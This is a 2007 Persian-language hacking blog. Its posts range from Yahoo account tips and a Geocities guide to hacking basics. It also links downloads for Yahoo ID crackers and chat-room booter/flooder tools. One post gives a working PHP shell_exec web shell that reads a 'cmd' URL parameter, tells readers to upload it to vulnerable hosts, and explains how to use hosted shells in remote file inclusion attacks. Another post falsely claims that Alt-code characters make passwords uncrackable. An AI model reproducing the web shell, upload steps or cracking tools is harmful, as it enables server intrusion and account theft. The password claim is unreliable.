بهترین اموزش ها و مطالب در این سایت است

جلوگیری از هک شدن آی دی

farzadf2 — Mon, 05 Nov 2007 08:07:38 GMT

شما اگه يه كم حواستون جمع باشه هيچ وقت ايديتونو از دست نميديد اونم خيلي سادس و اگه ايديتون هك شده ميتونيد همين حالا پسوردشو پيدا كنيد كه بستگي به همون حواس جمعي خودتونه همون طور كه ميدونيد در هنگام گرفتن اي دي از شما سوالاتي ميشه از جمله zip code secret guestion country و تاريخ تولد حالا اگه شما موقع ثبت نام اينارو يادتون بمونه اگه حتي كسي پسوردتونو پيدا كنه و عوض كنه شما كافيه به mail.yahoo.com بريد و روي forget password كليك كنيد كه همون سوالاتي كه در بالا به اونا اشاره شد ازتون ميپرسه جواب بديد بعد خود ياهوو پسورد ايدي شما رو عوض ميكنه و پسورد جديدي بهتون ميده اميد وارم با اين روش شما ايديهاي از دست رفتتونو به دست بياريد در ضمن من يه چيزي بگم كه من تو اين سايت در واقع آموزش هك نميدم فقط چيزايي كه فكر ميكنم به دردتون ميخوره و ميتونه مفيد باشه آموزش ميدم چون اگه بخوام هكو به طور حرفه اي آموزش بدم 90% شما حاليتون نميشه پس هي نيايد اين پايين چرت و پرت بنويسيد كه مثلا اگه بلدي آموزش دور زدن اكسپلويتو ياد بده اين آموزشا براي كسايي كه حد اقل ميتونند روزي 2 3 تا سايت هك كنن پس لطف كنيد شما كه هنوز چيزي از هك كردن سايت نميدوني چرت و پرت نگو مرسي

راه اندازی یک وب سایت شخصی مجانی در یــــــــاهـــــــــــو

farzadf2 — Mon, 05 Nov 2007 08:06:58 GMT

شروع کار :

1) به سایت YAHOO وارد شوید و در قسمت بالای صفحه گزینه Geocities را بیابید و بر روی آن کلیک کنید تا به صفحه بعد بروید.

2)در صفحه باز شده UserName و Password خود را وارد کنید و کلید SIGN In را فشار دهید این عمل در حقیقت بدان معنا است که شما از قبل در سایت yahoo ثبت نام کرده و دارای صندوق پستی هستید .

3)در صفحه بعد بر روی گزینه YAHOO PAGE WIZARD کلیک کنید .

4)در این صفحه شما می توانید از انواع الگو های از پیش ساخته جهت ساخت صفحات خود استفاده کنید پس می توانید بر روی یکی از آنها کلیک کنید و به صفحه بعد بروید.

5)در این صفحه شما می توانید با توجه به سلیقه خود رنگ دلخواه را انتخاب کنید .

6)در صفحه WELCOM TO YAHOO بر روی گزینه BEGIN کلیک کنید وسپس در صفحه Chooses A Look For Your Page می توانید یکی از سبکهای موجود صفحه را انتخاب کنید و سپس بر روی گزینه NEXT کلیک کنید.

7)سپس در صفحه ENTER YOUR INTO باید در قسمت YOUR NAME نام خود و در قسمت YOUR EMAIL ADDRESS آدرس ایمیل خود را وارد کنید با این کار نام و آدرس پستی شما به صفحه وب اضافه می شود .

8)در صفحه YOUR PICTURE PICK می توانید تصویر دلخواه خود را به صفحه وب خود اضافه کنید برای این کار بر روی گزینه UPLOAD NEW IMAGE کلیک کنید .این کار تقیقا مانند ATTACH کردن فایل به نامه است .لازم به توضیح است که شما می توانید از تصاویر پیش فرض نیز استفاده کنید .همچنین در صورت عدم تمایل به داشتن تصویر بر روی گزینه DONT USE AN IMAGE کلیک کنید تا به صفحه بعد بروید .

9)در این صفحه در قسمت DESCRIB YOURSELF می توانید توضیحاتی را در مورد خود به صفحه وب اضافه کنید پس از این کار بر روی گزینه NEXT کلیک کنید.

10)در این صفحه در قسمت ENTER YOUR FAVORITE LINKS می توانید آدرس های دلخواه را به صورت لینک وارد کنید و بعد بر روی گزینه NEXT کلیک کنید .

11)در این صفحه می توانید در قسمت DESCRIB YOUR FRIENDS AND FAMILY شما می توانید توضیحات دلخواه خود را اضافه کنید حال گزینه NEXT را کلیک کنید تا به صفحه بعد بروید .

12)در صفحه NAME YOUR PAGE شما می توانید نامی را برای صفحه وب خود تعریف کنید سپس بر روی گزینه NEXT کلیک کنید .

13)در این صفحه یعنی صفحه آخر YAHOO به خاطر ساختن این سایت به شما تبریک می گوید و از این پس شما دارای یک وب سایت شخصی هستید .

تذکر :در این مثال ما از الگوی پیش ساخته PERSONAL PAGE استفاده کردیم ممکن است در صورت انتخاب الگو های دیگر توضیحات کمی متفاوت باشد البته فرم کلی آن بدین صورت می باشد

بوتر تک بوت لوگینی

farzadf2 — Mon, 05 Nov 2007 08:04:44 GMT

بچه ها یه بوتر تک بوت لوگینی آوردم براتون.....

واسه اونایی که آی دی زیاد ندارن که کسی رو بوت کنند

اگه کار کرد یا مشکل داشت تو نظرات بگید.....

دانلود بوتر

پسوردي که هرگز هک نمي شود

farzadf2 — Mon, 05 Nov 2007 08:04:18 GMT

با سلام به همه دوستان عزیز

براي همه ي ما امنيت پسورد و حفاظت از آن,يک مساله دايم و هميشگي بوده است.اما با انجام اين ترفند,ديگر نگران هک شدن پسورد خود نباشيد.در واقع شما مي توانيد براي انتخاب نام پسورد,از يکي از کاراکترهاي خاص از جملهⁿ,√,■,... استفاده کنيد.براي تست و مشاهده اين کاراکترها,مي توانيد برنامه Notepad يا Word را باز کرده,کليد Alt را پايين نگه داشته و مثلا عدد 251(از قسمت اعداد ماشين حسابي صفحه کليد)را تايپ نماييد;خواهيد ديد که علامت √ ظاهر مي گردد و يا عدد 252 را تايپ کرده و علامت ⁿ ظاهر مي گردد...(که مي توانيد از ترکيب کليد Alt و اين اعداد,براي اسامي پوشه ها,کلمه عبور خود ويندوز و ... استفاده نماييد).همچنين در نظر داشته باشيد که در صورتي که در اسامي رمز خود از ترکيب کليدهاي ياد شده و کاراکترهاي مورد نظر استفاده کنيد(حتي اگر فرضا 2 کاراکتر ابتدا و انتهاي پسورد شما از چنين علاماتي تشکيل شده باشد مثل:√3457896■), در اين صورت حتي نرم افزارهاي کشف پسورد که اين روزها در اينترنت فراوان يافت مي شوند نيز نخواهند توانست رمز شما را کشف کنند,و يا اگر هم مهاجمين بخواهند در اين مورد اصرار داشته باشند,اين پروسه و جريان بسيار به درازا خواهد کشيد,به طوري که قطعا مايوس شده و دست از کار مي کشند.

phoenix

farzadf2 — Mon, 05 Nov 2007 08:03:16 GMT

دانلود

به تعدادی همکار نیاز مندیم

farzadf2 — Fri, 02 Nov 2007 07:26:32 GMT

به همکار نیاز داریم

PHP shell ها چی هستند؟

farzadf2 — Fri, 02 Nov 2007 06:52:41 GMT

در اين مقاله شما با PHP Shellers آشنايی کامل پيدا خواهيد کرد .

PHP Shell ها با يک سری کدهای PHP نوشته شده اند و به هکر اين اجازه رو ميدن که در صورت آسيب پذير بودن server به ديگر سايتها و ديگر فايلها و پوشه های server دسترسی داشته باشه و بتونه فايل آپلود کنه يا فايلی رو بخونه يا پاک کنه يا توش چيزی بنويسه و Save کنه البته اين به پرميژنی که فايل يا پوشه داراست بستگی داره که بعدا با پرميژن آشنا ميشيم .

perm :

پرميژن ميزان دسترسی فايل يا پوشه رو تعئين ميکنه . که پرم 777 از همه با لاتر هستش و دسترسی

Read - Write - Execute داره يعنی اگه Folder باشه ميتونيم توی اون Folder فايل کپی کنيم يا بخونيم و ياDelete کنيم .

نکته/

اگر فايلی پرمی باشه که بشه توش Write کرد به اصطلاح بهش ميگن اين فايل Perm هستش !

چيزها يی که درباره Perm ها بايد بدانيم :

Perm هايی که با حرف d شروع ميشه يعنی اينکه پوشه هستند ( Folder ) که حرف d معرف Directory هستش مانند : drwxrwxrwx که اين پرم يک پرم 777 هستش . شما در اين Folder ها ميتوانيد فايل آپلود کنيد .

Perm هايی که با خط تيره ( - ) شروع ميشوند نشون ميدان که فايل هست نه Folder !

برای مثال : -rw-rw-rw- که شما با Edit کردن فايل ميتونيد توش هر کدی رو يا نوشته اي رو save کنيد .

حرف r به معنی Read و حرف W به معنی Write هستش .

اگر از شل c99 استفاده ميکنيد . کار شما راحتر هستش چرا که فايلها و دايرکتوری هايی که پرم هستن در C99 به رنگ سبز در قسمت مربوط به پرمها مشخص هستند و آنهايی که سفيد يا قزمز هستند به معنی پرم نبودن آنها هست .

پس يادتون باشه اگر دسترسی بالا نداريد ( Root ) پس فقط در دايرکتوری و فايلهايی که پرم هستند ميتوانيد فايل کپی کنيد يا آپلود کنيد . و يا در فايلها بنويسيد .

نکاتی در باره C99 :

بعد اينکه C99 رو جايی آپلود کرديم بايد به نکاتی توجه کنيم :

به بالای C99 دقت کنيد .

1 = اين قسمت برنامه هايی که WeB Server برای WeB استفاده ميکنه و همچنين ورژن php رو نشون ميده .

2 = Uname -a سرور که اطلاعاتی درباره server هست رو به ما ميده که من اينجا رو سيستم خودم

php shell رو بالا آوردم ( لوکال ) و از ويندوز استفاده ميکنم .

3 = اين قسمت خيلی مهّم هستش ! اگه Safe-Mode = On باشه server ميشه گفت Secure هستش ولی باز ميشه کاری کرد . در اين حالت هيچ کمندی قابل اجرا نيست و رفتن به دايرکتوری ديگه ممکن نيست .در چنين مواقع ميتوانيد از باگ های PHP Safe Mode Bypass که سيف مد رو دور ميزنه استفاده کنيد . ( در صورتی که پچ نشده باشه )

4 = اين قسمت دايرکتوری که در آن هستيم رو نشون ميد که من اينجا در درايو C خودم هستم و با پرم 777

5 = اين قسمت ميزان فضای خالی هارد رو مشخص ميکنه و ...

6 = اين قسمت درايو های هارد منو نشون ميده

به عکس زير دقت کنيد . قسمتی که با عدد 1 معرفی شده دارای 3 عمل به شرح زير ميباشد که روی يک فايل ميتواند اجرا بشود . ولی روی Folder ها وقت يک عمل Info قابل اجرست که اطلاعاتی راجع به Folder به ما ميدهد

به ترتيب از سمت چاپ به راست اينگونه است :

Info - Edit - Download

بسيار خوب فکر ميکنم اطلاعات کافی درمورد PHP shell ها دادم .

بياييد خودمون يک نمونه php shell بنويسيم که روی يک server که php ساپورت ميکنه Command اجرا کنه :

يک فايل php shell ميتواند Command را به صورتهای گوناگونی که موجود است Execute کنه روی يک server که به شرح زير هستند :

اينجا من از Shell_exec برای اجرا کردن Command خودم روی يک server استفاده ميکنم . يک Notepad باز کنيد و کدهای php زير را توش بنويسين .

$cmd=$_Get['cmd'];

$exec=shell_exec("$cmd");

//"$executing";

echo

>";

بسيار خوب حالا با پسوند php سيو کنيد و روی يک هاست آسيب پذير آپلود کنيد . و بعد از باز کرد صفحه شل

بعد از آدرس شل اين کد رو بنويسين ?cmd= بعد از (=) Command مورد نظر خود را اجرا کنيد

برای مثال : http://www.site.com/shell.php?cmd=ls => در لينوکس

http://www.site.com/shell.php?cmd=dir => در ويندوز

پيشنهاد ميکنم دستورات لينکوس و ويندوز رو بلد باشيد مخصوصا لينکوس که بيشتر server ها لينوکس هستند

ما shell های زيادی داريم بعضی از آنها را در زير ميبينيد :

c99

nstview

webadmin

cmd.php

در ضمن برای هک کردن سايتها از باگ هايی نظير remote File Inclusion شما ميتوانيد اين shell ها را با پسوند .txt يا بدون پسوند روی يک فضای خالی آپلود کنيد و در اين گونه باگ ها ازش استفاده کنيد !

يک نمونه فضای رايگان www.sharemation.com بعد از ثبت نام يادتون نره که فايل آپلود شده رو از Panel خودتون Share کنيد

توضیحاتی در مورد هک

farzadf2 — Fri, 02 Nov 2007 06:51:08 GMT

Hacker: به معنای نفوذگر . به شخصی که هدف اصلی او نشان دادن قدرت خود به کامپيوتر و ساير ماشين ها است وارد شدن به سيستم و يا شکست دادن محاسبات , کنجکاوی در اطلاعات محرمانه از خصوصيات يک هکر است . هکر يک برنامه نويس کنجکاو است که صدمه ای وارد نمی کند و حتی باعث تحکيم انتقالات می شود .

هکر ها به چند گروه تقصيم می شوند :

1 - گروه نفوذگران کلاه سفيد ( White Hat Hacker Group )

اين گروه از هکرها در واقع همان دانشجويان و اساتيد هستند که هدفشان نشان دادن ضعف سيستم های امنيتی شبکه های کامپيوتری می باشند اين گروه به نام هکرهای خوب معروف هستند .

اين دسته نه تنها مضر نيستند بلکه در تحکيم دايواره حفاظتی شبکه ها نقش اساسی دارند کلاه سفيد ها داری خلاقيت عجيبی هستند معمولا هر بار با روش جديدی از ديواره امنيتی عبور می کنند .

2 - گروه نفوذگران کلاه سياه ( Black Hat Hacker Group )

نام ديگر اين گروه Cracker است. کراکرها خرابکار ترين نوع هکرها هستند . اين گروه به طور کاملا پنهانی اقدام به عمليات خراب کارانه می کنند . کلاه سياه ها اولين چيزی که به فکرشان می رسد نفوذ به سيستم قربانی است کلاه سياه ها همه ويروس نويسند و با ارسال ويروس نوشته شده خود بر روی سيستم قربانی به آن سيستم نفوذ پيدا می کند درواقع يک جاسوس بر روی سيستم قربانی می فرستند . هميشه هويت اصلی اين گروه پنهان است .

3 - گروه نفوذگران کلاه خاکستری ( Gray Hat Hacker Group )

نام ديگر اين گروه Whacker می باشد هدف اصلی واکر استفاده از اطلاعات ساير کامپيوترها به مقصود مختلف می باشد و صدمه ای به کامپيوتر ها وارد نمی کنند . اين گروه کدهای ورود به سيستم های امنيتی را پيدا کرده و به داخل آن نفوذ می کنند اما سرقت و خراب کاری جز کارهای کلاه خاکستری نيست . بلکه اطلاعات را در اختيار عموم مردم قرار می دهند . در سال ۱۹۹۴ يک هکر ژاپنی به سايت Nasa امريکا نفوذ پيدا کرد و تمامی اسناد محرمانـه متعلق به اين سازمان را ربود و به طور رايگان بر روی اينترنت در اختيار عموم قرار داد .

4 - گروه نفوذگران کلاه سفيد ( Pink Hat Hacker Group )

نام ديگر اين گروه Booter می باشد . بوتر ها افرادی لوس و بی سودی هستند که فقط قادرند در سيستمها اخلال بوجود آورند و يا مزاحم ساير کاربران در سالنهای چت شوند. کلاه صورتی ها اغلب جوانان عصبانی و جسوری هستند که ازنرم افزارهای ديگران استفاده می کنند و خود سواد برنامه نويسی ندارند. ولی در بعضی مواقع همين هکرهای کم سواد می توانند خطرهای جدی برای امنيت باشند. ...

بسياری از هکرها انسانهای هستند که خود را بسيار آزاد می داند و قصد دارند خود را در دنيای ديگر بر تر سازند.

هيچ کس نمی تواند قدرت هکرها را در نفوذ به سيستمها ناديده بگيرد...

Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند...

- تعريف چند اصطلاح:

*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه )

*** Preaker :
از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه انواع کامپيوتر‌های شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد.

- انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند:

=> سيستم‌های فعلی:
* خانواده Unix (مثل FreeBSD , Linux )
* خانواده Windows (مثل WinNT, Win2000 )
* Sun Solaris
* OsMac
=> سيستم‌های قديمی (منقرض شده - آخيش ! ):
AIX, IRIS, DEC10, DEC20 , ...

- سوال: کدام‌ها را بايد ياد گرفت؟
Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد. تقسيم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !

۲- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند در بسياری از درس‌های آينده از Command Prompt (خط فرمان) ويندوز استفاده خواهيم کرد. برای باز کردن آن يکی از روش‌های زير را به کار بريد:

۱- مسير زير را در ويندوز طی کنيد: چه چيزهايی را بايد داشته باشم تا شروع کنم؟

۱- Win2000 , Linux را روی کامپيوتر خود نصب کرده و شروع به يادگيری کنيد.
۲- شروع به يادگيری زبان C کنيد.
۳- شروع به يادگيری TCP/IP کنيد. (يک کتاب بخريد )
۴- مهمترين چيز علاقه به طی کردن يک را بسييييييار طوووووولانی

IP :
شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم)

پورت (Port):
در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد:

Port Num   Service         Why it's phun!
--------   -------         ----------------------------------------
7          echo            Host repearts what you type
9          discard         Dev/null 
11         systat          Lots of info on users
13         daytime         Time and date at computer's location
15         netstat         Tremendous info on networks
19         chargen         Pours out a stream of ASCII characters.
21         ftp             Transfers files
23         telnet          Where you log in.
25         smpt            Forge email
37         time            Time
39         rlp             Resource location
43         whois           Info on hosts and networks
53         domain          Nameserver
70         gopher          Out-of-date info hunter
79         finger          Lots of info on users
80         http            Web server
110        pop             Incoming email
119        nntp            Usenet news groups -- forge posts, cancels
443        shttp           Another web server
512        biff            Mail notification
513        rlogin          Remote login
           who             Remote who and uptime
514        shell           Remote command, no password used!
           syslog          Remote system logging
520        route           Routing information protocol

از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.
◊ چگونه به يک پورت Telnet کنيم؟
برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
<در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم www.iums.ac.ir مي‌نويسيد:
telnet iums.ac.ir 13 telnet iums.ac.ir daytime
<هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد <
<◊ تقسيم‌بندی انواع حملات
<
اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
حمله به روش Denial of Service Attack) DoS)
حمله به روش Exploit
حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
حمله به روش Disinformation

فعلآ همینو داشته باشید

2 کرکر جدید Oxiode Final + Y!Load Cracker

farzadf2 — Fri, 02 Nov 2007 05:18:41 GMT

Y!Load Cracker این هم یک کرکر جدید علاوه بر کرک آیدی داری یک پروکسی چکر نیز می باشد

Oxiode Final کرکری که با پروکسی کار می کنه

v3بوتر روم

farzadf2 — Sat, 27 Oct 2007 08:11:20 GMT

نابودگر چت روم کارش خیلی خوب
سلام دوستان
این هم یک روم لاگر که توسط برنامه نویس ایرانی نوشته شده.ورژن جدید این برنامه هستش.قابلیت لاگین کردن 50 آیدی و وارد اونها رو به روم داره.با تغیرات یاهو کاملا سازگار شده و کاملا کار می کنه.دارای روم لاگر,روم تکست لاگر, و چندین قابلیت دیگه

کلیک کن دانلود